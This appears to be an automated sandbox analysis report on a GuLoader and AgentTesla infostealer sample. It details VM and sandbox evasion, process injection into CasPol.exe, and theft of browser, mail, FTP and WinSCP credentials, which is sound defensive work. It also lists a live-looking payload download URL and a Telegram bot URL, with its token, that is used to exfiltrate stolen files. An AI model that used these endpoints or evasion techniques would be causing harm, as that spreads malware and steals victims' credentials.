Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\conhost.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Tries to detect Any.run
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Program Files\qga\qga.exe Jump to behavior
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: SecuriteInfo.com.generic.ml.22865.exe, 00000001.00000002.9736726497.00000000006C8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE=
Source: SecuriteInfo.com.generic.ml.22865.exe, 00000001.00000002.9740903132.00000000033F1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: SecuriteInfo.com.generic.ml.22865.exe, 00000001.00000002.9740903132.00000000033F1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: NTDLLUSER32KERNEL32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 10.0; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=WINDIR=\MICROSOFT.NET\FRAMEWORK\V2.0.50727\CASPOL.EXEWINDIR=\SYSWOW64\IERTUTIL.DLL
Source: SecuriteInfo.com.generic.ml.22865.exe, 00000001.00000002.9736726497.00000000006C8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE-
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 3896 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 3896 Thread sleep time: -73680000s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 5380 Thread sleep time: -70000s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 3896 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 3896 Thread sleep time: -380000s >= -30000s Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe TID: 3896 Thread sleep time: -58532s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Contains long sleeps (>= 3 min)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Window / User API: threadDelayed 2456 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Window / User API: threadDelayed 760 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\libpcre-1.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\MpCommu.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\lang-1034.dll Jump to dropped file
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\libfreetype-6.dll Jump to dropped file
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe Code function: 1_2_032B2013 rdtsc 1_2_032B2013
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Thread delayed: delay time: 30000 Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe API call chain: ExitProcess graph end node
Source: SecuriteInfo.com.generic.ml.22865.exe, 00000001.00000002.9741588774.0000000004F09000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.14446223075.0000000002D79000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Guest Shutdown Service
Source: SecuriteInfo.com.generic.ml.22865.exe, 00000001.00000002.9741588774.0000000004F09000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.14446223075.0000000002D79000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: SecuriteInfo.com.generic.ml.22865.exe, 00000001.00000002.9736726497.00000000006C8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe=
Source: CasPol.exe, 00000004.00000002.14446223075.0000000002D79000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicshutdown
Source: SecuriteInfo.com.generic.ml.22865.exe, 00000001.00000002.9736726497.00000000006C8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exe-
Source: SecuriteInfo.com.generic.ml.22865.exe, 00000001.00000002.9741588774.0000000004F09000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.14446223075.0000000002D79000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: SecuriteInfo.com.generic.ml.22865.exe, 00000001.00000002.9741588774.0000000004F09000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.14446223075.0000000002D79000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V PowerShell Direct Service
Source: SecuriteInfo.com.generic.ml.22865.exe, 00000001.00000002.9741588774.0000000004F09000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.14446223075.0000000002D79000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Time Synchronization Service
Source: CasPol.exe, 00000004.00000002.14446223075.0000000002D79000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicvss
Source: CasPol.exe, 00000004.00000002.14445156063.0000000001184000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.14444614539.000000000112B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: SecuriteInfo.com.generic.ml.22865.exe, 00000001.00000002.9740903132.00000000033F1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: SecuriteInfo.com.generic.ml.22865.exe, 00000001.00000002.9741588774.0000000004F09000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.14446223075.0000000002D79000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Data Exchange Service
Source: SecuriteInfo.com.generic.ml.22865.exe, 00000001.00000002.9741588774.0000000004F09000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.14446223075.0000000002D79000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Heartbeat Service
Source: SecuriteInfo.com.generic.ml.22865.exe, 00000001.00000002.9741588774.0000000004F09000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000004.00000002.14446223075.0000000002D79000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Hyper-V Guest Service Interface
Source: SecuriteInfo.com.generic.ml.22865.exe, 00000001.00000002.9740903132.00000000033F1000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ntdlluser32kernel32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=windir=\Microsoft.NET\Framework\v2.0.50727\caspol.exewindir=\syswow64\iertutil.dll
Source: CasPol.exe, 00000004.00000002.14446223075.0000000002D79000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmicheartbeat
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe Code function: 1_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 1_2_00405D74
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe Code function: 1_2_0040290B FindFirstFileW, 1_2_0040290B
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe Code function: 1_2_0040699E FindFirstFileW,FindClose, 1_2_0040699E
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe System information queried: ModuleInformation Jump to behavior
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe Code function: 1_2_716A1BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW, 1_2_716A1BFF
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe Code function: 1_2_032C173F mov eax, dword ptr fs:[00000030h] 1_2_032C173F
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe Code function: 1_2_032B9FF0 mov eax, dword ptr fs:[00000030h] 1_2_032B9FF0
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe Code function: 1_2_032BA263 mov ebx, dword ptr fs:[00000030h] 1_2_032BA263
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe Code function: 1_2_032BA263 mov eax, dword ptr fs:[00000030h] 1_2_032BA263
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe Code function: 1_2_032B9A77 mov eax, dword ptr fs:[00000030h] 1_2_032B9A77
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe Code function: 1_2_032BA288 mov ebx, dword ptr fs:[00000030h] 1_2_032BA288
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe Code function: 1_2_032BA144 mov eax, dword ptr fs:[00000030h] 1_2_032BA144
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe Code function: 1_2_032BFD57 mov eax, dword ptr fs:[00000030h] 1_2_032BFD57
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe Code function: 1_2_032BA1B6 mov eax, dword ptr fs:[00000030h] 1_2_032BA1B6
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe Code function: 1_2_032BA428 mov eax, dword ptr fs:[00000030h] 1_2_032BA428
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe Code function: 1_2_032BA030 mov eax, dword ptr fs:[00000030h] 1_2_032BA030
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe Code function: 1_2_032BA05B mov eax, dword ptr fs:[00000030h] 1_2_032BA05B
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe Code function: 1_2_032BA0F2 mov eax, dword ptr fs:[00000030h] 1_2_032BA0F2
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe Code function: 1_2_032C04C3 mov eax, dword ptr fs:[00000030h] 1_2_032C04C3
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe Code function: 1_2_032B2013 rdtsc 1_2_032B2013
Enables debug privileges
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Process token adjusted: Debug Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Code function: 4_2_1D4A5AA0 LdrInitializeThunk, 4_2_1D4A5AA0
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
Writes to foreign memory regions
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe Memory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe base: F00000 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe Process created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe "C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe" Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Queries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Queries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Security\2.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\System.Security\2.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.generic.ml.22865.exe Code function: 1_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess, 1_2_00403640

Stealing of Sensitive Information
barindex
Yara detected AgentTesla
Source: Yara match File source: 00000004.00000002.14466824232.000000001D5C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: CasPol.exe PID: 2696, type: MEMORYSTR
Yara detected Telegram RAT
Source: Yara match File source: 00000004.00000002.14466824232.000000001D5C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: CasPol.exe PID: 2696, type: MEMORYSTR
Tries to steal Mail credentials (via file / registry access)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\ Jump to behavior
Yara detected Credential Stealer
Source: Yara match File source: 00000004.00000002.14466824232.000000001D5C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: CasPol.exe PID: 2696, type: MEMORYSTR

Remote Access Functionality
barindex
Yara detected AgentTesla
Source: Yara match File source: 00000004.00000002.14466824232.000000001D5C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: CasPol.exe PID: 2696, type: MEMORYSTR
Yara detected Telegram RAT
Source: Yara match File source: 00000004.00000002.14466824232.000000001D5C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: CasPol.exe PID: 2696, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 634596 Sample: SecuriteInfo.com.generic.ml... Startdate: 26/05/2022 Architecture: WINDOWS Score: 100 26 www.fides-kenya.com 2->26 28 fides-kenya.com 2->28 30 api.telegram.org 2->30 36 Found malware configuration 2->36 38 Multi AV Scanner detection for submitted file 2->38 40 Yara detected GuLoader 2->40 42 5 other signatures 2->42 8 SecuriteInfo.com.generic.ml.22865.exe 5 36 2->8         started        signatures3 process4 file5 18 C:\Users\user\AppData\Local\...\System.dll, PE32 8->18 dropped 20 C:\Users\user\AppData\Local\...\libpcre-1.dll, PE32+ 8->20 dropped 22 C:\Users\user\AppData\...\libfreetype-6.dll, PE32+ 8->22 dropped 24 2 other files (none is malicious) 8->24 dropped 44 Writes to foreign memory regions 8->44 46 Tries to detect Any.run 8->46 12 CasPol.exe 15 11 8->12         started        signatures6 process7 dnsIp8 32 fides-kenya.com 5.9.197.244, 49752, 80 HETZNER-ASDE Germany 12->32 34 api.telegram.org 149.154.167.220, 443, 49753 TELEGRAMRU United Kingdom 12->34 48 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 12->48 50 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 12->50 52 Tries to steal Mail credentials (via file / registry access) 12->52 54 5 other signatures 12->54 16 conhost.exe 12->16         started        signatures9 process10
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
149.154.167.220
 api.telegram.org United Kingdom
62041 TELEGRAMRU false
5.9.197.244
 fides-kenya.com Germany
24940 HETZNER-ASDE true

Contacted Domains

Name IP Active
fides-kenya.com 5.9.197.244 true
api.telegram.org 149.154.167.220 true
www.fides-kenya.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.fides-kenya.com/yem/wam.bin true
  • Avira URL Cloud: safe
 unknown
https://api.telegram.org/bot5147163644:AAEDa60jT_0f_OgilwiEp-CBiARVO2Rx3Mo/sendDocument false
    		high